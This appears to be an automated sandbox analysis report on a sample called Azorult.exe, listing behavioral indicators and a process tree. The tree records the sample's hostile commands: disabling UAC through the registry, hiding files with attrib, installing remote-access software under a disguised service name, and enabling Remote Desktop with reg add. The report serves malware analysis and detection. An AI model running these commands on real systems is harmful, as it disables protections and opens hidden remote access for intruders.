Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	cmd.exe

NTFS ADS 2 IoCs

Processes:

taskhostw.exemsedge.exe

description	ioc	process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 980620.crdownload:SmartScreen	msedge.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

220 regedit.exe
1908 regedit.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5048 schtasks.exe
3896 schtasks.exe
5148 schtasks.exe
4944 schtasks.exe

pid	process
220	regedit.exe
1908	regedit.exe

pid	process
5048	schtasks.exe
3896	schtasks.exe
5148	schtasks.exe
4944	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeAzorult.exetaskmgr.exerutserv.exerutserv.exerutserv.exerutserv.exeAzorult.exerfusclient.exewinit.exe

pid	process
1616	chrome.exe
1616	chrome.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
4988	Azorult.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
3764	rutserv.exe
3764	rutserv.exe
3764	rutserv.exe
3764	rutserv.exe
3764	rutserv.exe
3764	rutserv.exe
2872	taskmgr.exe
4436	rutserv.exe
4436	rutserv.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
4972	rutserv.exe
4972	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
2864	Azorult.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
1652	rutserv.exe
2872	taskmgr.exe
2872	taskmgr.exe
220	rfusclient.exe
220	rfusclient.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
4044	winit.exe
4044	winit.exe
4044	winit.exe
4044	winit.exe
4044	winit.exe
4044	winit.exe
4044	winit.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

Processes:

taskhostw.exetaskmgr.exechrome.exePcAppStore.exe

pid process

624 taskhostw.exe
2872 taskmgr.exe
3676 chrome.exe
4724 PcAppStore.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

652
652
652

pid	process
624	taskhostw.exe
2872	taskmgr.exe
3676	chrome.exe
4724	PcAppStore.exe

pid	process
652
652
652

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 34 IoCs

Processes:

chrome.exemsedge.exe

pid	process
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
440	msedge.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
440	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

rfusclient.exe

pid process

4600 rfusclient.exe

pid	process
4600	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe
Token: SeShutdownPrivilege	1616	chrome.exe
Token: SeCreatePagefilePrivilege	1616	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
1616	chrome.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
2872	taskmgr.exe
1616	chrome.exe

Suspicious use of SetWindowsHookEx 26 IoCs

Processes:

Azorult.exewini.exewinit.exerutserv.exerutserv.exerutserv.execheat.exeAzorult.exerutserv.exeink.exetaskhost.exeP.exeR8.exewinlogon.exetaskhostw.exewinlogon.exechrome.exePcAppStore.exe

pid	process
4988	Azorult.exe
744	wini.exe
4044	winit.exe
3764	rutserv.exe
4436	rutserv.exe
4972	rutserv.exe
1656	cheat.exe
2864	Azorult.exe
1652	rutserv.exe
2404	ink.exe
3620	taskhost.exe
4340	P.exe
648	R8.exe
5936	winlogon.exe
624	taskhostw.exe
3508	winlogon.exe
3676	chrome.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe
4724	PcAppStore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1616 wrote to memory of 4692	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 4692	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 2824	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 1672	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 1672	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe
PID 1616 wrote to memory of 3968	1616	chrome.exe	chrome.exe

System policy modification 1 TTPs 3 IoCs

Modify Registry

Processes:

Azorult.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

3892 attrib.exe
1324 attrib.exe
5956 attrib.exe
5208 attrib.exe
2568 attrib.exe
5928 attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://github.com/endermanch
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe59ccc40,0x7fffe59ccc4c,0x7fffe59ccc58
2⤵
PID:4692

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2084,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2080 /prefetch:2
2⤵
PID:2824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1728,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2224 /prefetch:3
2⤵
PID:1672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2264 /prefetch:8
2⤵
PID:3968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3052,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3080 /prefetch:1
2⤵
PID:4176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3108 /prefetch:1
2⤵
PID:2776

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3864,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3672 /prefetch:1
2⤵
PID:2736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3396,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3360 /prefetch:8
2⤵
PID:4596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5052,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3692 /prefetch:1
2⤵
PID:732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3336,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4908 /prefetch:1
2⤵
PID:3056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5340,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5152 /prefetch:8
2⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5148,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5388 /prefetch:8
2⤵
PID:2452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,1584781230857352376,10103081335150176488,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5352 /prefetch:8
2⤵
PID:3132

C:\Users\Admin\Downloads\Azorult.exe
"C:\Users\Admin\Downloads\Azorult.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:4988

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:744

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
4⤵
- Checks computer location settings
PID:1644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
5⤵
PID:4960

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:220

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
6⤵
- Runs .reg file with regedit
PID:1908

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:5088

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3764

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4436

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4972

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
6⤵
- Views/modifies file attributes
PID:2568

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
6⤵
- Views/modifies file attributes
PID:5208

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
6⤵
- Launches sc.exe
PID:5220

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
6⤵
- Launches sc.exe
PID:5236

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
6⤵
- Launches sc.exe
PID:5252

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
5⤵
PID:3664

C:\Windows\SysWOW64\timeout.exe
timeout 5
6⤵
- Delays execution with timeout.exe
PID:5396

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1656

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3620

C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4340

C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:648

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
6⤵
- Checks computer location settings
PID:808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
7⤵
- Checks computer location settings
- Modifies registry class
PID:4020

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:5400

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:5444

C:\Windows\SysWOW64\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:1960

C:\Windows\SysWOW64\chcp.com
chcp 1251
8⤵
- System Location Discovery: System Language Discovery
PID:5984

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
8⤵
- Executes dropped EXE
PID:6028

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:4560

C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- Delays execution with timeout.exe
PID:4340

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
8⤵
- Checks computer location settings
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
9⤵
PID:3712

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
10⤵
PID:5456

C:\Windows\SysWOW64\reg.exe
